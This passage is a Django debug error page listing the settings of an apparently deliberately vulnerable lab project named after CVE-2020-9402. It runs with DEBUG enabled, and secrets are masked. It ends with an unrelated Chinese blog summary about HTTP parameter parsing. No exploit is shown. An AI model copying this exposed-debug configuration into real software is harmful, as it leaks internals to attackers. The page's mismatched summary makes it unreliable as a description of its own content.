<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_NAME</td>
<td class="code"><pre>'csrftoken'</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_PATH</td>
<td class="code"><pre>'/'</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_SAMESITE</td>
<td class="code"><pre>'Lax'</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_SECURE</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>CSRF_FAILURE_VIEW</td>
<td class="code"><pre>'django.views.csrf.csrf_failure'</pre></td>
</tr>
<tr>
<td>CSRF_HEADER_NAME</td>
<td class="code"><pre>'HTTP_X_CSRFTOKEN'</pre></td>
</tr>
<tr>
<td>CSRF_TRUSTED_ORIGINS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>CSRF_USE_SESSIONS</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>DATABASES</td>
<td class="code"><pre>{'default': {'ATOMIC_REQUESTS': False,
'AUTOCOMMIT': True,
'CONN_MAX_AGE': 0,
'ENGINE': 'django.db.backends.sqlite3',
'HOST': '',
'NAME': '/root/django_cve_2020_9402/db.sqlite3',
'OPTIONS': {},
'PASSWORD': '********************',
'PORT': '',
'TEST': {'CHARSET': None,
'COLLATION': None,
'MIRROR': None,
'NAME': None},
'TIME_ZONE': None,
'USER': ''}}</pre></td>
</tr>
<tr>
<td>DATABASE_ROUTERS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>DATA_UPLOAD_MAX_MEMORY_SIZE</td>
<td class="code"><pre>2621440</pre></td>
</tr>
<tr>
<td>DATA_UPLOAD_MAX_NUMBER_FIELDS</td>
<td class="code"><pre>1000</pre></td>
</tr>
<tr>
<td>DATETIME_FORMAT</td>
<td class="code"><pre>'N j, Y, P'</pre></td>
</tr>
<tr>
<td>DATETIME_INPUT_FORMATS</td>
<td class="code"><pre>['%Y-%m-%d %H:%M:%S',
'%Y-%m-%d %H:%M:%S.%f',
'%Y-%m-%d %H:%M',
'%Y-%m-%d',
'%m/%d/%Y %H:%M:%S',
'%m/%d/%Y %H:%M:%S.%f',
'%m/%d/%Y %H:%M',
'%m/%d/%Y',
'%m/%d/%y %H:%M:%S',
'%m/%d/%y %H:%M:%S.%f',
'%m/%d/%y %H:%M',
'%m/%d/%y']</pre></td>
</tr>
<tr>
<td>DATE_FORMAT</td>
<td class="code"><pre>'N j, Y'</pre></td>
</tr>
<tr>
<td>DATE_INPUT_FORMATS</td>
<td class="code"><pre>['%Y-%m-%d',
'%m/%d/%Y',
'%m/%d/%y',
'%b %d %Y',
'%b %d, %Y',
'%d %b %Y',
'%d %b, %Y',
'%B %d %Y',
'%B %d, %Y',
'%d %B %Y',
'%d %B, %Y']</pre></td>
</tr>
<tr>
<td>DEBUG</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>DEBUG_PROPAGATE_EXCEPTIONS</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>DECIMAL_SEPARATOR</td>
<td class="code"><pre>'.'</pre></td>
</tr>
<tr>
<td>DEFAULT_CHARSET</td>
<td class="code"><pre>'utf-8'</pre></td>
</tr>
<tr>
<td>DEFAULT_EXCEPTION_REPORTER_FILTER</td>
<td class="code"><pre>'django.views.debug.SafeExceptionReporterFilter'</pre></td>
</tr>
<tr>
<td>DEFAULT_FILE_STORAGE</td>
<td class="code"><pre>'django.core.files.storage.FileSystemStorage'</pre></td>
</tr>
<tr>
<td>DEFAULT_FROM_EMAIL</td>
<td class="code"><pre>'webmaster@localhost'</pre></td>
</tr>
<tr>
<td>DEFAULT_INDEX_TABLESPACE</td>
<td class="code"><pre>''</pre></td>
</tr>
<tr>
<td>DEFAULT_TABLESPACE</td>
<td class="code"><pre>''</pre></td>
</tr>
<tr>
<td>DISALLOWED_USER_AGENTS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>EMAIL_BACKEND</td>
<td class="code"><pre>'django.core.mail.backends.smtp.EmailBackend'</pre></td>
</tr>
<tr>
<td>EMAIL_HOST</td>
<td class="code"><pre>'localhost'</pre></td>
</tr>
<tr>
<td>EMAIL_HOST_PASSWORD</td>
<td class="code"><pre>'********************'</pre></td>
</tr>
<tr>
<td>EMAIL_HOST_USER</td>
<td class="code"><pre>''</pre></td>
</tr>
<tr>
<td>EMAIL_PORT</td>
<td class="code"><pre>25</pre></td>
</tr>
<tr>
<td>EMAIL_SSL_CERTFILE</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>EMAIL_SSL_
KEYFILE</td>
<td class="code"><pre>'********************'</pre></td>
</tr>
<tr>
<td>EMAIL_SUBJECT_PREFIX</td>
<td class="code"><pre>'[Django] '</pre></td>
</tr>
<tr>
<td>EMAIL_TIMEOUT</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>EMAIL_USE_LOCALTIME</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>EMAIL_USE_SSL</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>EMAIL_USE_TLS</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>FILE_CHARSET</td>
<td class="code"><pre>'utf-8'</pre></td>
</tr>
<tr>
<td>FILE_UPLOAD_DIRECTORY_PERMISSIONS</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>FILE_UPLOAD_HANDLERS</td>
<td class="code"><pre>['django.core.files.uploadhandler.MemoryFileUploadHandler',
'django.core.files.uploadhandler.TemporaryFileUploadHandler']</pre></td>
</tr>
<tr>
<td>FILE_UPLOAD_MAX_MEMORY_SIZE</td>
<td class="code"><pre>2621440</pre></td>
</tr>
<tr>
<td>FILE_UPLOAD_PERMISSIONS</td>
<td class="code"><pre>420</pre></td>
</tr>
<tr>
<td>FILE_UPLOAD_TEMP_DIR</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>FIRST_DAY_OF_WEEK</td>
<td class="code"><pre>0</pre></td>
</tr>
<tr>
<td>FIXTURE_DIRS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>FORCE_SCRIPT_NAME</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>FORMAT_MODULE_PATH</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>FORM_RENDERER</td>
<td class="code"><pre>'django.forms.renderers.DjangoTemplates'</pre></td>
</tr>
<tr>
<td>IGNORABLE_404_URLS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>INSTALLED_APPS</td>
<td class="code"><pre>['django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.
staticfiles',
'app']</pre></td>
</tr>
<tr>
<td>INTERNAL_IPS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>LANGUAGES</td>
<td class="code"><pre>[
('af', 'Afrikaans'
),
('ar', 'Arabic'
),
('ast', 'Asturian'
),
('az', 'Azerbaijani'
),
('bg', 'Bulgarian'
),
('be', 'Belarusian'
),
('bn', 'Bengali'
),
('br', 'Breton'
),
('bs', 'Bosnian'
),
('ca', 'Catalan'
),
('cs', 'Czech'
),
('cy', 'Welsh'
),
('da', 'Danish'
),
('de', 'German'
),
('dsb', 'Lower Sorbian'
),
('el', 'Greek'
),
('en', 'English'
),
('en-au', 'Australian English'
),
('en-gb', 'British English'
),
('eo', 'Esperanto'
),
('es', 'Spanish'
),
('es-ar', 'Argentinian Spanish'
),
('es-co', 'Colombian Spanish'
),
('es-mx', 'Mexican Spanish'
),
('es-ni', 'Nicaraguan Spanish'
),
('es-ve', 'Venezuelan Spanish'
),
('et', 'Estonian'
),
('eu', 'Basque'
),
('fa', 'Persian'
),
('fi', 'Finnish'
),
('fr', 'French'
),
('fy', 'Frisian'
),
('ga', 'Irish'
),
('gd', 'Scottish Gaelic'
),
('gl', 'Galician'
),
('he', 'Hebrew'
),
('hi', 'Hindi'
),
('hr', 'Croatian'
),
('hsb', 'Upper Sorbian'
),
('hu', 'Hungarian'
),
('hy', 'Armenian'
),
('ia', 'Interlingua'
),
('id', 'Indonesian'
),
('io', 'Ido'
),
('is', 'Icelandic'
),
('it', 'Italian'
),
('ja', 'Japanese'
),
('ka', 'Georgian'
),
('kab', 'Kabyle'
),
('kk', 'Kazakh'
),
('km', 'Khmer'
),
('kn', 'Kannada'
),
('ko', 'Korean'
),
('lb', 'Luxembourgish'
),
('lt', 'Lithuanian'
),
('lv', 'Latvian'
),
('mk', 'Macedonian'
),
('ml', 'Malayalam'
),
('mn', 'Mongolian'
),
('mr', 'Marathi'
),
('my', 'Burmese'
),
('nb', 'Norwegian Bokmål'
),
('ne', 'Nepali'
),
('nl', 'Dutch'
),
('nn', 'Norwegian Nynorsk'
),
('os', 'Ossetic'
),
('pa', 'Punjabi'
),
('pl', 'Polish'
),
('pt', 'Portuguese'
),
('pt-br', 'Brazilian Portuguese'
),
('ro', 'Romanian'
),
('ru', 'Russian'
),
('sk', 'Slovak'
),
('sl', 'Slovenian'
),
('sq', 'Albanian'
),
('sr', 'Serbian'
),
('sr-latn', 'Serbian Latin'
),
('sv', 'Swedish'
),
('sw', 'Swahili'
),
('ta', 'Tamil'
),
('te', 'Telugu'
),
('th', 'Thai'
),
('tr', 'Turkish'
),
('tt', 'Tatar'
),
('udm', 'Udmurt'
),
('uk', 'Ukrainian'
),
('ur', 'Urdu'
),
('uz', 'Uzbek'
),
('vi', 'Vietnamese'
),
('zh-hans', 'Simplified Chinese'
),
('zh-hant', 'Traditional Chinese'
)]</pre></td>
</tr>
<tr>
<td>LANGUAGES_BIDI</td>
<td class="code"><pre>['he', 'ar', 'fa', 'ur']</pre></td>
</tr>
<tr>
<td>LANGUAGE_CODE</td>
<td class="code"><pre>'en-us'</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_AGE</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_DOMAIN</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_HTTPONLY</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_NAME</td>
<td class="code"><pre>'django_language'</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_PATH</td>
<td class="code"><pre>'/'</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_SAMESITE</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_SECURE</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>LOCALE_PATHS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>LOGGING</td>
<td class="code"><pre>{}</pre></td>
</tr>
<tr>
<td>LOGGING_CONFIG</td>
<td class="code"><pre>'logging.config.dictConfig'</pre></td>
</tr>
<tr>
<td>LOGIN_REDIRECT_URL</td>
<td class="code"><pre>'/accounts/profile/'</pre></td>
</tr>
<tr>
<td>LOGIN_URL</td>
<td class="code"><pre>'/accounts/login/'</pre></td>
</tr>
<tr>
<td>LOGOUT_REDIRECT_URL</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>MANAGERS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>MEDIA_ROOT</td>
<td class="code"><pre>''</pre></td>
</tr>
<tr>
<td>MEDIA_URL</td>
<td class="code"><pre>''</pre></td>
</tr>
<tr>
<td>MESSAGE_STORAGE</td>
<td class="code"><pre>'django.contrib.messages.storage.fallback.FallbackStorage'</pre></td>
</tr>
<tr>
<td>MIDDLEWARE</td>
<td class="code"><pre>['django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware']</pre></td>
</tr>
<tr>
<td>MIGRATION_MODULES</td>
<td class="code"><pre>{}</pre></td>
</tr>
<tr>
<td>MONTH_DAY_FORMAT</td>
<td class="code"><pre>'F j'</pre></td>
</tr>
<tr>
<td>NUMBER_GROUPING</td>
<td class="code"><pre>0</pre></td>
</tr>
<tr>
<td>PASSWORD_HASHERS</td>
<td class="code"><pre>'********************'</pre></td>
</tr>
<tr>
<td>PASSWORD_RESET_TIMEOUT_DAYS</td>
<td class="code"><pre>'********************'</pre></td>
</tr>
<tr>
<td>PREPEND_WWW</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>ROOT_URLCONF</td>
<td class="code"><pre>'vuln.urls'</pre></td>
</tr>
<tr>
<td>SECRET_
KEY</td>
<td class="code"><pre>'********************'</pre></td>
</tr>
<tr>
<td>SECURE_BROWSER_XSS_FILTER</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SECURE_CONTENT_TYPE_NOSNIFF</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>SECURE_HSTS_INCLUDE_SUBDOMAINS</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SECURE_HSTS_PRELOAD</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SECURE_HSTS_SECONDS</td>
<td class="code"><pre>0</pre></td>
</tr>
<tr>
<td>SECURE_PROXY_SSL_HEADER</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>SECURE_REDIRECT_EXEMPT</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>SECURE_REFERRER_POLICY</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>SECURE_SSL_HOST</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>SECURE_SSL_REDIRECT</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SERVER_EMAIL</td>
<td class="code"><pre>'root@localhost'</pre></td>
</tr>
<tr>
<td>SESSION_CACHE_ALIAS</td>
<td class="code"><pre>'default'</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_AGE</td>
<td class="code"><pre>1209600</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_DOMAIN</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_HTTPONLY</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_NAME</td>
<td class="code"><pre>'sessionid'</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_PATH</td>
<td class="code"><pre>'/'</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_SAMESITE</td>
<td class="code"><pre>'Lax'</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_SECURE</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SESSION_ENGINE</td>
<td class="code"><pre>'django.contrib.sessions.backends.db'</pre></td>
</tr>
<tr>
<td>SESSION_EXPIRE_AT_BROWSER_CLOSE</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SESSION_FILE_PATH</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>SESSION_SAVE_EVERY_REQUEST</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SESSION_SERIALIZER</td>
<td class="code"><pre>'django.contrib.sessions.serializers.JSONSerializer'</pre></td>
</tr>
<tr>
<td>SETTINGS_MODULE</td>
<td class="code"><pre>'vuln.settings'</pre></td>
</tr>
<tr>
<td>SHORT_DATETIME_FORMAT</td>
<td class="code"><pre>'m/d/Y P'</pre></td>
</tr>
<tr>
<td>SHORT_DATE_FORMAT</td>
<td class="code"><pre>'m/d/Y'</pre></td>
</tr>
<tr>
<td>SIGNING_BACKEND</td>
<td class="code"><pre>'django.core.signing.TimestampSigner'</pre></td>
</tr>
<tr>
<td>SILENCED_SYSTEM_CHECKS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>
STATICFILES_DIRS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>
STATICFILES_FINDERS</td>
<td class="code"><pre>['django.contrib.
staticfiles.finders.FileSystemFinder',
'django.contrib.
staticfiles.finders.AppDirectoriesFinder']</pre></td>
</tr>
<tr>
<td>
STATICFILES_STORAGE</td>
<td class="code"><pre>'django.contrib.
staticfiles.storage.
StaticFilesStorage'</pre></td>
</tr>
<tr>
<td>
STATIC_ROOT</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>
STATIC_URL</td>
<td class="code"><pre>'/
static/'</pre></td>
</tr>
<tr>
<td>TEMPLATES</td>
<td class="code"><pre>[{'APP_DIRS': True,
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'OPTIONS': {'con
text_processors': ['django.template.con
text_processors.debug',
'django.template.con
text_processors.request',
'django.contrib.auth.con
text_processors.auth',
'django.contrib.messages.con
text_processors.messages']}}]</pre></td>
</tr>
<tr>
<td>TEST_NON_SERIALIZED_APPS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>TEST_RUNNER</td>
<td class="code"><pre>'django.test.runner.DiscoverRunner'</pre></td>
</tr>
<tr>
<td>THOUSAND_SEPARATOR</td>
<td class="code"><pre>','</pre></td>
</tr>
<tr>
<td>TIME_FORMAT</td>
<td class="code"><pre>'P'</pre></td>
</tr>
<tr>
<td>TIME_INPUT_FORMATS</td>
<td class="code"><pre>['%H:%M:%S', '%H:%M:%S.%f', '%H:%M']</pre></td>
</tr>
<tr>
<td>TIME_ZONE</td>
<td class="code"><pre>'UTC'</pre></td>
</tr>
<tr>
<td>USE_I18N</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>USE_L10N</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>USE_THOUSAND_SEPARATOR</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>USE_TZ</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>USE_X_FORWARDED_HOST</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>USE_X_FORWARDED_PORT</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>WSGI_APPLICATION</td>
<td class="code"><pre>'vuln.wsgi.application'</pre></td>
</tr>
<tr>
<td>X_FRAME_OPTIONS</td>
<td class="code"><pre>'DENY'</pre></td>
</tr>
<tr>
<td>YEAR_MONTH_FORMAT</td>
<td class="code"><pre>'F Y'</pre></td>
</tr>
</tbody>
</table>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard page generated by the handler for this status code.
</p>
</div>
</body>
</html>
本文介绍了一种通用的HTTP请求参数解析方法,该方法能够根据不同类型的请求参数返回相应的值,支持int和string类型,并提供了默认值处理及类型转换错误时的回退策略。
扫一扫
917
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
